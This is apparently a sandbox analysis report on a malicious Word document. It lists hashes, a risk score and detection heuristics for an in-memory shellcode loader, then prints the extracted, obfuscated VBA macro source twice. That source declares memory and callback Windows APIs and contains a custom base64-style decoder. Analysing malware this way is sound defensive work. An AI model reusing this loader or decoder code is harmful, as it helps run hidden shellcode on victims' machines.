Office (OLE) malware analysis — malicious · 79a849e37deb3e60

MALICIOUS

Office (OLE)

166.0 KB Created: 2016-10-17 13:09:00 Authoring application: Microsoft Office Word First seen: 2018-08-05

MD5: 588042ea084dd4654f6201e1ddbd8816 SHA-1: 8b1e9f2eea9c465b4b238404103d9573806f4a3f SHA-256: 79a849e37deb3e608c179dadf6866ff1205c563995f237c9b9d7d83ea52f6864

82 Risk Score

Heuristics 3

Raw OLE macro native-memory callback shellcode loader critical OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER

Raw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://www.iec.chIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6720 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6720 bytes
SHA-256: `a6bdbae148026a2c52399c8c2ef348b757c3b5f7b621c1fa447e2283226decd9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "accountable" #If Win64 Then Public Type delicatessen header As LongPtr End Type Public Declare PtrSafe Function plowboy Lib "user32" Alias "EndDialog" (ByVal gaseous As LongPtr,nResult As LongPtr) As LongPtr Public Declare PtrSafe Function outcome Lib "kernel32" Alias "EnumUILanguagesW" (ByVal typographical As Any, ByVal flags As Any, steel As Any) As LongPtr Public Declare PtrSafe Function spongy Lib "user32" Alias "GetWindowText" (hwnd As LongPtr, buf As Any, nMaxCount As LongPtr) As LongPtr Public Declare PtrSafe Function quaterque Lib "kernel32" Alias "TlsAlloc" () As LongPtr Public Declare PtrSafe Sub kyles Lib "ntdll" Alias "RtlMoveMemory" (fecundify As Any, disenthrone As Any, ByVal diastole As LongPtr) Public Declare PtrSafe Function circumduction Lib "kernel32" Alias "HeapCreate" (ByVal coleridge As LongPtr,forefathers As delicatessen, fulfillment As delicatessen) As LongPtr Public Declare PtrSafe Function disentanglement Lib "kernel32" Alias "RemoveDirectoryA" (nigerien As LongPtr) Public Declare PtrSafe Function heckelphone Lib "user32" Alias "GetDC" (ByVal pop As LongPtr) As LongPtr Public Declare PtrSafe Function illustrated Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr) Public Declare PtrSafe Function RtlAllocateHeap Lib "ntdll" (ByVal arpent As LongPtr, ByVal squeegee As LongPtr, ByVal blather As LongPtr) As LongPtr #Else Public Declare Function butte Lib "user32" Alias "GetWindowText" (hwnd As Long, buf As Any, nMaxCount As Long) As Long Public Declare Function lumpfish Lib "kernel32" Alias "RemoveDirectoryA" (babbler As Long) Public Declare Function febrifugal Lib "user32" Alias "GetDC" (cowardice As Long) As Long Public Declare Function caviar Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long) Public Declare Function cruel Lib "user32" Alias "EndDialog" (ByVal unjustifiably As Long, cilium As Long) As Long Public Declare Function RtlAllocateHeap Lib "ntdll" (ByVal chronography As Long, ByVal steatornis As Long, ByVal proletaire As Long) As Long Public Declare Function circumduction Lib "kernel32" Alias "HeapCreate" (ByVal nonaddictive As Long, ByVal fruitbearing As Long, ByVal decuration As Long) As Long Public Declare Function outcome Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal blunted As Any, lParam As Any) As Long Public Declare Sub kyles Lib "ntdll" Alias "RtlMoveMemory" (aidance As Any, motile As Any, ByVal meditate As Long) Public Declare Function unfree Lib "kernel32" Alias "TlsAlloc" () As Long #End If Sub zoom() With Documents("Sample.doc").Windows(1).View .Type = wdPrintView With .zoom .PageColumns = 3 .PageRows = 2 End With End With End Sub Function synopsis(necessitarian, reenforcement) synopsis = necessitarian \ reenforcement End Function Function aggression(cowl, crinkled) aggression = cowl * crinkled End Function Function christmasberry(crosswind, pendency) christmasberry = crosswind And pendency End Function Function animative(carbolated) As String Dim digress As Long Dim coatrack(63) As Long Dim imperially As Integer Dim letoile(63) As Long capillament = confined Dim glyceraldehyde As Integer Dim ingenerate() As Byte Dim incircumspect(63) As Long Dim unvariedness As Long Dim corrivalship As String Dim morgantown(255) As Byte Dim bang As Long Dim almondshaped As Integer Dim proteinaceous As String Dim synercus() As Byte Dim coreference As Long confined = "multure" galleon = 116 + 16514956 equitation = 143 + 65393 actuarial = 99 + 3933 Dim afterage As Byte reach = 1 + 62 acarina = 65280 mitrailleuse = 294 - 39 edelweiss = 64 drawknife = 4096 Dim chambers As Long cuquenan = 262144 adytum = 17 + 16711663 Dim procellariidae As Long chromatin = 256 rejuvenation = 258048 Dim mallard As String Dim plethodon() As Byte ReDim plethodon(4287) rioter = 357 + 3931 For i = 1 To rioter malecite = Mid(carbolated, i, 1) unrecognizable = (Asc(malecite)) sigmoidoscope = "aboutface" plethodon(i - 1) = unrecognizable Next Dim tragically As String For brooch = 14 To 67 attentiveness = 67 buchloe = "abolishable" dreams = Mid("apoplexyahbellows", 9, 2) & LCase("oRSE") dreams = "pl" & Left("ottebra", 4) & LCase("r") Next brooch balinese = 245 + 4042 footsteps = 35 For clamydospore = 0 To balinese plethodon(clamydospore) = plethodon(clamydospore) + 2 Next clamydospore For elaphurus = 15 To 72 heirapparent = 72 ensue = ensue And 351 quiddet = Mid("mouchardmihindu", 9, 2) & RightB$("hootdrib", 4) quiddet = "ma" & Mid("biochemicallylposedextirpation", 14, 6) Next elaphurus imperially = 0 memorization = 465 - 343 mycomycin = 501 - 246 For coreference = 0 To mycomycin Select Case coreference Case 65 To 90 morgantown(coreference) = coreference - 65 Case 97 To memorization morgantown(coreference) = coreference - 71 Case 48 To 57 morgantown(coreference) = coreference + 4 Case 43 morgantown(coreference) = 62 Case 47 morgantown(coreference) = 63 End Select Next coreference For coreference = 0 To 63 coatrack(coreference) = aggression(coreference, edelweiss) incircumspect(coreference) = aggression(coreference, drawknife) letoile(coreference) = aggression(coreference, cuquenan) Next coreference For clavicle = 18 To 55 micelle = 55 ensue = pokeweed And 483 adiaphanous = Mid("arbeitmatcatasetum", 7, 3) & "ronag" & RightB$("playsomee", 1) adiaphanous = LCase("El") & Mid("bryonyeventhfatuis", 7, 6) Next clavicle ingenerate = plethodon aleurone = 346 - 342 ReDim synercus((((4287 + 1) \ aleurone) * 3) - 1) For choeronycteris = 10 To 50 dichtung = 50 pokeweed = pokeweed And 311 faut = Mid("humaniequcost", 7, 3) & Left("ipolltachypleus", 5) & LCase("Ent") faut = "ch" & RightB$("orthologyink", 3) Next choeronycteris kosteletzya = 380 - 377 averment = averment / 341 pokeweed = anisogamic - 277 lachrymatory = kosteletzya + 1 maniclike = 189 - 187 For unvariedness = 0 To 4287 Step lachrymatory checkmake = ingenerate(unvariedness) bang = letoile(morgantown(checkmake)) _ + incircumspect(morgantown(ingenerate(unvariedness + 1))) + coatrack(morgantown(ingenerate(unvariedness + 2))) + morgantown(ingenerate(unvariedness + kosteletzya)) coreference = christmasberry(bang, adytum) synercus(digress) = synopsis(coreference, equitation) coreference = christmasberry(bang, acarina) synercus(digress + 1) = synopsis(coreference, chromatin) synercus(digress + maniclike) = christmasberry(bang, mitrailleuse) digress = digress + maniclike + 1 Next unvariedness animative = synercus End Function

SHA-256: a6bdbae148026a2c52399c8c2ef348b757c3b5f7b621c1fa447e2283226decd9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "accountable"
#If Win64 Then
Public Type delicatessen
header As LongPtr
End Type
Public Declare PtrSafe Function plowboy Lib "user32" Alias "EndDialog" (ByVal gaseous As LongPtr,nResult As LongPtr) As LongPtr
Public  Declare PtrSafe Function outcome Lib "kernel32" Alias "EnumUILanguagesW" (ByVal typographical As Any, ByVal flags As Any, steel As Any) As LongPtr
Public Declare PtrSafe Function spongy Lib "user32" Alias "GetWindowText" (hwnd As LongPtr, buf As Any, nMaxCount As LongPtr) As LongPtr
Public Declare PtrSafe Function quaterque Lib "kernel32" Alias "TlsAlloc" () As LongPtr
Public  Declare PtrSafe Sub kyles Lib "ntdll" Alias "RtlMoveMemory" (fecundify As Any, disenthrone As Any, ByVal diastole As LongPtr)
Public  Declare PtrSafe Function circumduction Lib "kernel32" Alias "HeapCreate" (ByVal coleridge As LongPtr,forefathers As delicatessen, fulfillment As delicatessen) As LongPtr
Public Declare PtrSafe Function disentanglement Lib "kernel32" Alias "RemoveDirectoryA" (nigerien As LongPtr)
Public Declare PtrSafe Function heckelphone Lib "user32" Alias "GetDC" (ByVal pop As LongPtr) As LongPtr
Public Declare PtrSafe Function illustrated Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
Public  Declare PtrSafe Function RtlAllocateHeap Lib "ntdll" (ByVal arpent As LongPtr, ByVal squeegee As  LongPtr, ByVal blather As LongPtr) As LongPtr

#Else
Public Declare Function butte Lib "user32" Alias "GetWindowText" (hwnd As Long, buf As Any, nMaxCount As Long) As Long
Public Declare Function lumpfish Lib "kernel32" Alias "RemoveDirectoryA" (babbler As Long)
Public Declare Function febrifugal Lib "user32" Alias "GetDC" (cowardice As Long) As Long
Public Declare Function caviar Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
Public Declare Function cruel Lib "user32" Alias "EndDialog" (ByVal unjustifiably As Long, cilium As Long) As Long
Public Declare Function RtlAllocateHeap Lib "ntdll" (ByVal chronography As Long, ByVal steatornis As Long, ByVal proletaire As Long) As Long
Public Declare Function circumduction Lib "kernel32" Alias "HeapCreate" (ByVal nonaddictive As Long, ByVal fruitbearing As Long, ByVal decuration As Long) As Long
Public Declare Function outcome Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal blunted As Any, lParam As Any) As Long
Public Declare Sub kyles Lib "ntdll" Alias "RtlMoveMemory" (aidance As Any, motile As Any, ByVal meditate As Long)
Public Declare Function unfree Lib "kernel32" Alias "TlsAlloc" () As Long

#End If
Sub zoom()
    With Documents("Sample.doc").Windows(1).View
        .Type = wdPrintView
        With .zoom
            .PageColumns = 3
            .PageRows = 2
        End With
    End With
End Sub


Function synopsis(necessitarian, reenforcement)
synopsis = necessitarian \ reenforcement
End Function
Function aggression(cowl, crinkled)
aggression = cowl * crinkled
End Function
Function christmasberry(crosswind, pendency)
christmasberry = crosswind And pendency
End Function
Function animative(carbolated) As String
Dim digress As Long
Dim coatrack(63) As Long
Dim imperially As Integer
Dim letoile(63) As Long
capillament = confined

Dim glyceraldehyde As Integer

Dim ingenerate() As Byte
Dim incircumspect(63) As Long
Dim unvariedness As Long
Dim corrivalship As String

Dim morgantown(255) As Byte
Dim bang As Long
Dim almondshaped As Integer

Dim proteinaceous As String
Dim synercus() As Byte
Dim coreference As Long
confined = "multure"

galleon = 116 + 16514956
equitation = 143 + 65393
actuarial = 99 + 3933
Dim afterage As Byte

reach = 1 + 62
acarina = 65280
mitrailleuse = 294 - 39
edelweiss = 64
drawknife = 4096
Dim chambers As Long

cuquenan = 262144
adytum = 17 + 16711663
Dim procellariidae As Long

chromatin = 256
rejuvenation = 258048
Dim mallard As String
Dim plethodon() As Byte
ReDim plethodon(4287)
rioter = 357 + 3931
For i = 1 To rioter
malecite = Mid(carbolated, i, 1)
unrecognizable = (Asc(malecite))
sigmoidoscope = "aboutface"
plethodon(i - 1) = unrecognizable
Next
Dim tragically As String
For brooch = 14 To 67
attentiveness = 67
buchloe = "abolishable"
dreams = Mid("apoplexyahbellows", 9, 2) & LCase("oRSE")
dreams = "pl" & Left("ottebra", 4) & LCase("r")
Next brooch

balinese = 245 + 4042
footsteps = 35
For clamydospore = 0 To balinese
plethodon(clamydospore) = plethodon(clamydospore) + 2
Next clamydospore
For elaphurus = 15 To 72
heirapparent = 72
ensue = ensue And 351
quiddet = Mid("mouchardmihindu", 9, 2) & RightB$("hootdrib", 4)
quiddet = "ma" & Mid("biochemicallylposedextirpation", 14, 6)
Next elaphurus

imperially = 0
memorization = 465 - 343
mycomycin = 501 - 246
For coreference = 0 To mycomycin
Select Case coreference
Case 65 To 90
morgantown(coreference) = coreference - 65
Case 97 To memorization
morgantown(coreference) = coreference - 71
Case 48 To 57
morgantown(coreference) = coreference + 4
Case 43
morgantown(coreference) = 62
Case 47
morgantown(coreference) = 63
End Select
Next coreference
For coreference = 0 To 63
coatrack(coreference) = aggression(coreference, edelweiss)
incircumspect(coreference) = aggression(coreference, drawknife)
letoile(coreference) = aggression(coreference, cuquenan)
Next coreference
For clavicle = 18 To 55
micelle = 55
ensue = pokeweed And 483
adiaphanous = Mid("arbeitmatcatasetum", 7, 3) & "ronag" & RightB$("playsomee", 1)
adiaphanous = LCase("El") & Mid("bryonyeventhfatuis", 7, 6)
Next clavicle

ingenerate = plethodon
aleurone = 346 - 342
ReDim synercus((((4287 + 1) \ aleurone) * 3) - 1)
For choeronycteris = 10 To 50
dichtung = 50
pokeweed = pokeweed And 311
faut = Mid("humaniequcost", 7, 3) & Left("ipolltachypleus", 5) & LCase("Ent")
faut = "ch" & RightB$("orthologyink", 3)
Next choeronycteris

kosteletzya = 380 - 377
averment = averment / 341

pokeweed = anisogamic - 277

lachrymatory = kosteletzya + 1
maniclike = 189 - 187
For unvariedness = 0 To 4287 Step lachrymatory
checkmake = ingenerate(unvariedness)
bang = letoile(morgantown(checkmake)) _
 + incircumspect(morgantown(ingenerate(unvariedness + 1))) + coatrack(morgantown(ingenerate(unvariedness + 2))) + morgantown(ingenerate(unvariedness + kosteletzya))
coreference = christmasberry(bang, adytum)
synercus(digress) = synopsis(coreference, equitation)
coreference = christmasberry(bang, acarina)
synercus(digress + 1) = synopsis(coreference, chromatin)
synercus(digress + maniclike) = christmasberry(bang, mitrailleuse)
digress = digress + maniclike + 1
Next unvariedness
animative = synercus
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.